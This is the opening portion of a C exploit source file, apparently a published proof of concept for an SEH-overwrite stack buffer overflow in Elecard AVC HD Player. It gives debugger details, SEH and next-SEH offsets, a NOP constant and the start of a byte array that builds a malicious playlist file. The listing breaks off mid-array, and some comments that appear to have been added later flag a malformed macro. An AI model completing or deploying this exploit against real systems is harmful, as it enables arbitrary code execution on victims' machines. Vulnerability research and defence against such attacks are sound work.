1 /*ELECARD AVC HD PLAYER STACK BUFFER OVERFLOW ( SEH OVERWRITE )
2 Name: elecard.c
3 CREDITS: the one and only fl0 fl0w
4 004533AE . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
5
6 SEH chain of main thread
7 Address SE handler
8 0012CB54 FFFFFFFF
9
10 Open the player in a debugger and you'll see the SEH handler --> FFFFFFFF and NEXT_SEH = EB049090
11
12 */
13
14 //START
15 #include <windows.h>
16 #include <stdlib.h>
17 #include <stdio.h>
18 #include <string.h>
19 #include <stdint.h>
20 #include <assert.h>
21
/* Constants for the proof-of-concept file generator. The code that uses them
 * is not visible in this part of the listing, so the notes below state only
 * what the definitions themselves show and hedge the rest. */

/* Number of bytes requested by ALLOCMEM. */
22 #define ALLOCSIZE 14911
/* Intended as a malloc helper for an ALLOCSIZE-byte char buffer.
 * NOTE(review): as published this is not a usable function-like macro, and
 * the malloc result is never checked for NULL. Reproduced unchanged. */
23 #define ALLOCMEM (x) { x = (char *)malloc (ALLOCSIZE * sizeof (char)) }
/* Presumably positions of the SE handler and next-SEH fields that the file
 * header comment refers to; TODO confirm against the code that uses them.
 * Defender context: overwriting an SEH record, as the file header describes,
 * is the pattern that /SAFESEH-linked modules and SEHOP are designed to
 * block. */
24 #define SEH 62
25 #define NEXT_SEH 58
/* x86 single-byte NOP opcode. */
26 #define NOP 0x90
/* Zero byte. */
27 #define NULLBYTE 0x00
28
29 uint8_t Header [] = { 0x23, 0x45, 0x58, 0x54, 0x4D, 0x33, 0x55, 0x0D, 0x0A, 0x23, 0x45, 0x58, 0x54, 0x49, 0x4E, 0x46,
30 0x3A, 0x33, 0x3A, 0x33, 0x36, 0x2C, 0x45, 0x76, 0x65, 0x72, 0x79, 0x20, 0x79, 0x6F, 0x75, 0x20,
31 0x65, 0x76, 0x65, 0x72, 0x79, 0x20, 0x6D, 0x65, 0x28, 0x53, 0x69, 0x6E, 0x67, 0x6C, 0x65, 0x20,
32 0x4D, 0x69, 0x78, 0x29, 0x0D, 0x0A, 0x43, 0x3A, 0x5C, 0x80, 0x82, 0x82, 0x82, 0x82, 0x60, 0x60,
33 0x60, 0x60, 0x80, 0x80, 0x80, 0x80, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
34 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
35 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
36 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
37 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
38 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
39 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
40 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48,
41 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48, 0x4